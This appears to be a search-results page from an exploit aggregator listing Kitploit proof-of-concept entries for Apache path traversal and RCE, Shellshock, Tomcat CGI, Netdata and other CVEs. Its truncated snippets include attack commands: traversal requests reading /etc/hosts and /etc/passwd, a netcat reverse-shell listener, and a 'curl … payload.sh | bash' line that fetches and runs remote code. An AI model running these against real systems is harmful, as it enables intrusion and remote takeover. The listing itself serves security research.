Lucene search
+L

2605 matches found

Kitploit
Kitploit
added 2026/09/14 6:02 p.m.6 views

cve-2021-42013

Apache 2.4.50 - Path Traversal or Remote Code Execution CVE-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50. Vulnerable instance of Docker is provided to get your hands dirty on CVE-2021-42013 If CGI-BIN is enabled...

9.8CVSS8AI score0.99964EPSS
SaveExploits191
Kitploit
Kitploit
added 2026/09/14 5:16 p.m.4 views

cve-2021-41773-and-cve-2021-42013

cve-2021-41773 and cve-2021-42013 cve-2021-41773 and cve-2021-42013 batch verification Python script Runtime environment: python3 Usage: python3 poc.py url.txt url.txt contains the URLs to be tested, and URLs with vulnerabilities will be written to success.txt The verification content is very...

9.8CVSS8AI score0.99992EPSS
SaveExploits191
Kitploit
Kitploit
added 2026/09/14 2:34 p.m.4 views

CVE-2014-6271

CVE-2014-6271 python2.7 Start listening on your machine. root@kitploit: nc -l -p 4444 Run python script by the rule below: python shellpoc.py root@kitploit: python shellpoc.py 10.10.10.101 /cgi-bin/status 10.10.10.1/4444 Enjoy...

10CVSS8.2AI score0.99999EPSS
SaveExploits146
Kitploit
Kitploit
added 2026/09/14 11:37 a.m.9 views

copyfail-deconstructed

copyfail-deconstructed Easy-to-understand version of CVE-2026-31431, a privilege escalation technique that allows anybody to become root. The original proof-of-concept is found here: https://github.com/theori-io/copy-fail-CVE-2026-31431, but is heavily compressed and minified so it can have as...

7.8CVSS6.6AI score0.99907EPSS
SaveExploits242References1
Kitploit
Kitploit
added 2026/09/14 11:30 a.m.6 views

CVE-2021-41773

CVE-2021-41773 I have developed a POC of CVE-2021-41773 , RCE + cgi-bin path traversal NOTE : TESTED ON APACHE2 2.4.49 You can pulled vuln Apache2 2.4.49 directly from Docker root@kitploit: $ sudo docker pull blueteamsteve/cve-2021-41773:no-cgid $ sudo docker run -dit -p 80:80...

9.8CVSS8.1AI score0.99992EPSS
SaveExploits165
Kitploit
Kitploit
added 2026/09/14 10:30 a.m.5 views

CVE-2024-22752

EaseUS MobiMover 6.0.5 Build 21620 - Insecure Files and Folders Permissions MobiMoverUILaunch.exe suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the executable file of the service with a binary of his choice under bin folder . The...

8.1CVSS5.9AI score0.00624EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/14 9:54 a.m.7 views

apache_2.4.50

Apache HTTP Server 2.4.50 LFI & RCE A python3 script for the CVE-2021-42013 - Apache HTTP Server 2.4.50 LFI & RCE. RCE requires cgi-bin to be enabled Getting Started Executing program LFI root@kitploit: python3 apache2.4.50.py -t http://apache.hack/ -lfi /etc/passwd RCE root@kitploit: python3...

9.8CVSS8.2AI score0.99964EPSS
SaveExploits191
Kitploit
Kitploit
added 2026/09/14 6:52 a.m.34 views

rifiuti2

Introduction Rifiuti2 is a for analyzing Windows Recycle Bin INFO2 file. Analysis of Windows Recycle Bin is usually carried out during Windows computer forensics. Rifiuti2 can extract file deletion time, original path and size of deleted files and whether the trashed files have been permanently...

5.5AI score
SaveExploits0References9
Kitploit
Kitploit
added 2026/09/14 2:23 a.m.7 views

CVE-2019-0232

CVE-2019-0232 Apache Tomcat Remote Code Execution on Windows - CGI-BIN Apache Tomcat Remote Code Execution on Windows cgi-bin Usage: root@kitploit: Usage: python CVE-2019-0232.py url cmd Test Environment: root@kitploit: jdk8 apache-tomcat-8.5.39...

9.3CVSS7.9AI score0.99652EPSS
SaveExploits11
Kitploit
Kitploit
added 2026/09/13 8:20 p.m.3 views

exploitApache

exploitApache exploit for CVE-2021-41773: Path Traversal cgi-bin...

9.8CVSS8AI score0.99992EPSS
SaveExploits165
Kitploit
Kitploit
added 2026/09/13 7:59 p.m.19 views

rifiuti2

Introducción Rifiuti2 es una herramienta para analizar archivos INFO2 de la Papelera de Reciclaje de Windows. El análisis de la Papelera de Reciclaje de Windows se realiza normalmente durante la informática forense en Windows. Rifiuti2 puede extraer la hora de eliminación de archivos, la ruta...

5.8AI score
SaveExploits0References9
Kitploit
Kitploit
added 2026/09/13 3:30 p.m.6 views

cgi-bin-shellshock

How to use Clone the repository or just copy-paste the one you prefer root@kitploit: sudo git clone https://github.com/Gurguii/shellshock.sh Run the script Bash root@kitploit: bash shellshock.sh -u -h -p Python root@kitploit: python3 shellshock.py -u -lh -lp Note: default LPORT is 4444, URL...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/13 2:27 p.m.6 views

CVE-2024-32019-poc

CVE-2024-32019-poc Netdata ndsudo PoC Build the binary: root@kitploit: go build -ldflags "-s -w" -o nvme poc.go upx nvme Run the bash script: root@kitploit: bash exploit.sh In target machine run in a writable directory: root@kitploit: curl http://:8000/payload.sh | bash It will automatically...

8.8CVSS7.9AI score0.01165EPSS
SaveExploits15References1
Kitploit
Kitploit
added 2026/09/13 12:50 p.m.3 views

Cgi-bin_bash_Reverse

Cgi-binbashReverse POC for CVE-2014-6271 Src:https://gist.github.com/matjohn2/bc9689c60d4c9c5a2538...

10CVSS8.2AI score0.99999EPSS
SaveExploits146References1
Kitploit
Kitploit
added 2026/09/13 11:14 a.m.5 views

CVE-2021-41773

https://target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts root@kitploit: id: CVE-2021-41773 info: name: Apache 2.4.49 Exploit author: numanturle severity: high requests: - method: GET path: - "BaseURL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts" matchers-condition: and matchers: - type: regex...

9.8CVSS8.4AI score0.99992EPSS
SaveExploits165
Kitploit
Kitploit
added 2026/09/12 2:55 p.m.7 views

CVE-2021-41773

CVE-2021-41773 POC & Lab For CVE-2021-41773 Setup Lab root@kitploit: $ git clone https://github.com/0xc4t/CVE-2021-41773 $ cd CVE-2021-41773 $ docker build -t cve-2021-41773 . $ docker run --name cve-2021-41773 -p 81:80 cve-2021-41773 PoC root@kitploit: RCE curl...

9.8CVSS8.1AI score0.99992EPSS
SaveExploits165
Kitploit
Kitploit
added 2026/09/12 9:13 a.m.7 views

perf-exploiter

perf-exploiter CVE-2014-2630 In one of our recent penetration tests we have abused a vulnerability affecting a suid binary called "xglance-bin". Part of HP Performance Monitoring solution , it allowed us to escalate our local unprivileged sessions on some Linux RHEL 7.x/8.x systems to root. To be...

4.4CVSS5.9AI score0.0708EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/09/11 9:40 p.m.8 views

Bin-Finder

Description This tool looks for either the processes that have a certain binary loaded or the processes that don't. This is useful in the following scenarios: It allows to detect processes where an specific EDR/AV dll is not loaded. This could lead to EDR's exception detection. It allows to obtai...

5.9AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/11 12:11 a.m.5 views

CVE-2021-41773

CVE-2021-41773 Vulnerable service Installation Several options: 1. Docker container root@kitploit: docker run -d -p 8080:80 12345qwert123456/apache2449cve-2021-41773 2. Dockerfile root@kitploit: git clone https://github.com/12345qwert123456/CVE-2021-41773.git cd...

9.8CVSS8.1AI score0.99992EPSS
SaveExploits165
Kitploit
Kitploit
added 2026/09/10 4:53 p.m.6 views

apache-cve-2021-41773-lab

Apache 2.4.49 Path Traversal Lab — CVE-2021-41773 Clone root@kitploit: git clone https://github.com/zubairahm3d/apache-cve-2021-41773-lab.git cd apache-cve-2021-41773-lab chmod +x apachelab.sh Usage Start the vulnerable server: root@kitploit: ./apachelab.sh choose option 1 Manual exploit:...

9.8CVSS8.1AI score0.99992EPSS
SaveExploits165
Rows per page
Query Builder